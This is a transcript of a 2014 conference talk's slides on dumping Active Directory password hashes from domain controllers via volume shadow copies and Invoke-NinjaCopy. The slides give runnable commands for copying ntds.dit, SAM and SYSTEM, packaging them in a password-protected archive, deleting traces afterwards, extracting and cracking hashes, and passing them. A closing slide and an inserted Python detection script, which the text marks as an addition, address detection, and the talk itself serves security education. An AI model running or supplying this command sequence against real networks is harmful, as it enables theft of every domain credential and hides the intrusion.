Dumping AD Hashes Without Process Injection

0xsalt
September 12, 2014

BSidesLA talk where I explore methods of dumping Active Directory hashes without using tools that do process injection into lsass.exe.


  1. Dumping AD Hashes Without Process Injection
     Russ Swift, @0xsalt

  2. Agenda
     - History: evolution and history
     - Methods: non-injection methods
     - DC Access: getting tools to the DC
     - VSS & PSH: volume shadow copy & PowerSploit
     - Extraction: export & extract
     - Cracking: overview of cracking method
     - Tools: hash passing tools
     - Detect: detect vssown / ninjacopy activity?

  3. $ id
     - swiftruss, @0xsalt, github.com/0xsalt, blog.0xsalt.com
     - InfoSec Manager at a financial services SaaS company in LA
     - West Coast: Hiring
     - East Coast: I know a guy
     - 10 years infosec experience
     - SANS Advisory Board
     - For my good friends Mark, Jeff and Scott, who will mock me while not understanding a lick of this: this is not about hash that needs salt, hash that you smoke or hash that you tag someone with. They are not octothorpes. These are hashes that you dump, crack and pass. Thank you for interacting with me like a normal person despite all the 10101110001 I speak.

  4. History
     - 2000-2001+: pwdump2, pwdump3e, fgdump, pwdump6 (lsass injection)
       - DLL injection into lsass.exe
       - DEP interaction causes crash & reboot
     - 2007: "priv hashdump", since Metasploit 3.0 (lsass injection)
       - injects raw assembly code
       - AntiVirus API hooking causes crash & reboot
     - 2010: "run hashdump" (no injection, needs SYSTEM)
       - direct registry access in memory
       - slow, no evidence, 100% safe
       - must have SYSTEM

  5. History
     - 2011: mimikatz! (lsass injection)
       - dumps cleartext from the WDigest provider
     - 2012: vssown.vbs (no injection, needs admin)
       - Mark Baggett (@MarkBaggett) & Tim Tomes (@lanmaster53), DerbyCon 2
     - 2013: Invoke-NinjaCopy PowerShell script (no injection, needs admin)
       - parses NTFS structures directly
       - bypasses file locks, only SYSTEM access

  6. Methods: non-injection, let me count the ways
     - reboot the DC to alternate media and copy files off
     - steal the virtual container (GuestStealer v1.1, a Perl script to steal files via wget path traversal from old ESX/VMware server systems)
     - rogue ESX / Hyper-V admins
     - Metasploit run hashdump
     - VSS service to copy ntds.dit, SYSTEM and SAM from a live system
     - NinjaCopy PowerSploit script

  7. DC Access: obtain an administrative credential
     - Hack, sniff, ask nicely
     - LM SMB relay
     - WKS -> SRV -> AD escalation
     - Have a hash / generate a hash

  8. DC Access: gain access
     - Remote Desktop
     - WCE
     - PsExec
     - Mimikatz
     - Winexe
     - nmap + smb-exec.nse
     - Meterpreter
     - FingerprintEncryption
     - WinRM + PowerShell

  9. DC Access: getting tools to the DC
     - Find a reasonable writeable directory; AV exclusion folders are handy for this
     - Upload script(s) with Meterpreter
     - Copy / paste into a cmd window to create the file
     - Copy via a file share

  10. VSS & PSH: volume shadow copy service
      - cscript vssown.vbs /list, /start, /create C, copy files, /delete [id] and/or stop the service
      - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ntds\ntds.dit .
      - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\config\SAM .
      - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\config\SYSTEM .

  11. VSS & PSH, VSS: create volume shadow copy
      - cscript vssown.vbs /list
      - cscript vssown.vbs /start
      - cscript vssown.vbs /create C
      - cscript vssown.vbs /list

  12. VSS & PSH, VSS: copy ntds.dit, SYSTEM and SAM
      - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ntds\ntds.dit .
      - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\config\SYSTEM .
      - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\config\SAM .

  13. VSS & PSH, VSS: compress, copy off system, cleanup
      - rar a -rr2p -u -ep1 %computername%.rar -hp%computername% ntds.dit SYSTEM SAM
      - cscript vssown.vbs /list
      - cscript vssown.vbs /delete [id]
      - del ntds.dit & del SYSTEM & del SAM & del vss.vbs & del rar.exe

  14. VSS & PSH: PowerSploit Invoke-NinjaCopy
      - .\Invoke-NinjaCopy.ps1 -Path "c:\windows\system32\config\SAM" -RemoteDestination "c:\temp\SAM" -ComputerName servername.domain.com
      - .\Invoke-NinjaCopy.ps1 -Path "c:\windows\system32\config\SYSTEM" -RemoteDestination "c:\temp\SYSTEM" -ComputerName servername.domain.com
      - .\Invoke-NinjaCopy.ps1 -Path "c:\windows\ntds\ntds.dit" -RemoteDestination "c:\temp\ntds.dit" -ComputerName servername.domain.com

  15. Extraction on a Linux system: configure your tools
      - apt-get install bkhive samdump2
      - Download / extract libesedb from http://sourceforge.net/projects/libesedb/
      - Download / extract ntdsxtract from http://www.csababarta.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
      - cd libesedb
      - chmod +x configure
      - ./configure && make
      - Download / extract dshashes.py into the NTDSXTRACT 1.0 folder from http://ptscripts.googlecode.com/svn/trunk/dshashes.py

  16. Extraction: prep ntds.dit
      - ./esedbexport ../ntds.dit

  17. Extraction: prep ntds.dit
      - ./esedbexport ../ntds.dit

  18. Extraction: extract hashes
      - Csaba Barta's ntdsxtract + patched dsusers.py
      - python /home/swiftr/tools/vss/NTDSXtract\ 1.0/dshashes.py ./ntds.dit.export/datatable.3 ./ntds.dit.export/link_table.5 --passwordhashes ./SYSTEM > domain_controller.hash.txt

  19. Extraction: extract historical hashes (default = 24)
      - Csaba Barta's ntdsxtract + patched dsusers.py
      - python /home/swiftr/tools/vss/NTDSXtract\ 1.0/dshashes.py ./ntds.dit.export/datatable.3 ./ntds.dit.export/link_table.5 --passwordhistory ./SYSTEM > domain_controller.hash.txt

  20. Cracking: overview of cracking method
      - ./john --pot=test.pot --session=lanman --format=LM hashes/lmntlm.txt
      - ./john --pot=test.pot --session=ntlm --wordlist=mywordlist.lst --rules --format=NT hashes/lmntlm.txt

  21. Cracking: run oclHashcat fingerprint attack
      - Create a wordlist from previously cracked passwords to build patterns
      - https://www.question-defense.com/2010/08/15/automated-password-cracking-use-oclhashcat-to-launch-a-fingerprint-attack
      - http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords

  22. Tools: pass the hashes
      - impacket libraries (wmiexec, smbclient, smbrelayx)
      - WCE
      - mimikatz
      - patched Samba tools, winexe
      - firefox
      - xfreerdp (MS just released kb2871997 to address restricted admin)
      - pth to an RDP session with no creds in memory (no kb2871997) -OR- credentials are stored in WDigest in plaintext (yes kb2871997)

  23. Detect: detect vssown / ninjacopy activity?
      - intelligent log analysis
      - anomalous user activity alerting
      - anomalous network flows
      - leave VSS off by default, alert if it's turned on
      - DLP on DCs
      - correct audit settings on DCs
      - you do have full pcaps of all your egress traffic, right?!

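The detection bullets above can be turned into a concrete rule. The following is an added example, not part of the talk, that flags the vssown.vbs / NinjaCopy sequence in exported Windows event data: a Service Control Manager 7036 showing the VSS service starting, followed by 4688 process-creation records whose command line touches the tools and paths the slides show. It assumes command-line auditing is enabled so 4688 carries the command line, and the event field names are a constructed simplification of a real export.

```python
import re
from datetime import datetime, timedelta

# Indicators taken from the commands shown in the talk: vssown.vbs, Invoke-NinjaCopy,
# and copies out of a HarddiskVolumeShadowCopyNN device touching ntds.dit or SAM/SYSTEM.
SUSPICIOUS_CMDLINE = re.compile(
    r"vssown\.vbs|Invoke-NinjaCopy|HarddiskVolumeShadowCopy\d+|ntds\.dit|"
    r"config\\(?:SAM|SYSTEM)\b",
    re.IGNORECASE,
)
# Service Control Manager 7036 wording when the VSS service comes up.
VSS_STARTED = re.compile(r"Volume Shadow Copy service entered the running state", re.I)
WINDOW = timedelta(minutes=30)  # /start -> /create -> copy happens quickly

def analyze(events):
    """Return (severity, time, reason) tuples, oldest first.
    A 7036 VSS start is MEDIUM on a DC that keeps VSS off; a 4688 with a
    suspicious command line is HIGH, and HIGH+ when it follows a VSS start
    within WINDOW, which is the vssown.vbs sequence the talk walks through.
    """
    findings, last_vss_start = [], None
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["event_id"] == 7036 and VSS_STARTED.search(ev.get("message", "")):
            last_vss_start = ts
            findings.append(("MEDIUM", ev["time"], f"VSS service started on {ev['host']}"))
        elif ev["event_id"] == 4688 and SUSPICIOUS_CMDLINE.search(ev.get("command_line", "")):
            recent = last_vss_start is not None and ts - last_vss_start <= WINDOW
            findings.append(("HIGH+" if recent else "HIGH", ev["time"],
                             f"{ev['user']} on {ev['host']} ran: {ev['command_line']}"))
    return findings

# Constructed sample events (field names are a simplified stand-in for a real
# event-log export): a VSS start, a shadow copy creation, a copy of ntds.dit
# out of the shadow copy, and one benign process for contrast.
SAMPLE_EVENTS = [
    {"time": "2014-09-12T10:00:00", "host": "DC01", "event_id": 7036, "user": "SYSTEM",
     "message": "The Volume Shadow Copy service entered the running state."},
    {"time": "2014-09-12T10:01:10", "host": "DC01", "event_id": 4688, "user": "CORP\\jdoe",
     "command_line": "cscript vssown.vbs /create C"},
    {"time": "2014-09-12T10:02:30", "host": "DC01", "event_id": 4688, "user": "CORP\\jdoe",
     "command_line": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ntds\ntds.dit ."},
    {"time": "2014-09-12T10:03:00", "host": "DC01", "event_id": 4688, "user": "CORP\\svc_backup",
     "command_line": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for severity, when, why in analyze(SAMPLE_EVENTS):
        print(severity, when, why)
```

The same patterns apply to Sysmon process-creation events; the 7036 check only adds value on DCs where the VSS service is normally left stopped, as the slide recommends.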
  24. Recap
      - History: evolution and history
      - Methods: non-injection methods
      - DC Access: getting tools to the DC
      - VSS & PSH: volume shadow copy & PowerSploit
      - Extraction: export & extract
      - Cracking: overview of cracking method
      - Tools: hash passing tools
      - Detect: detect vssown / ninjacopy activity?

  25. References
      - http://packetstormsecurity.com/Crackers/NT/
      - http://blog.gentilkiwi.com/downloads/mimikatz-asfws.pdf
      - https://code.google.com/p/ptscripts/source/browse/trunk/windows/vssown.vbs
      - https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping
      - https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
      - http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
      - http://www.ampliasecurity.com/research/wcefaq.html
      - http://passing-the-hash.blogspot.com/
      - @obscuresec Chris Campbell
      - Alva "Skip" Duckwall
      - https://code.google.com/p/passing-the-hash/
      - http://www.fyrmassociates.com/tools.html
      - http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl
      - http://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
      - http://technet.microsoft.com/en-us/library/hh994571(v=ws.10).aspx
      - http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib
      - http://www.josho.org/blog/blog/2013/03/07/samex/
      - http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
      - http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
      - http://www.room362.com/blog/2013/06/11/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-2/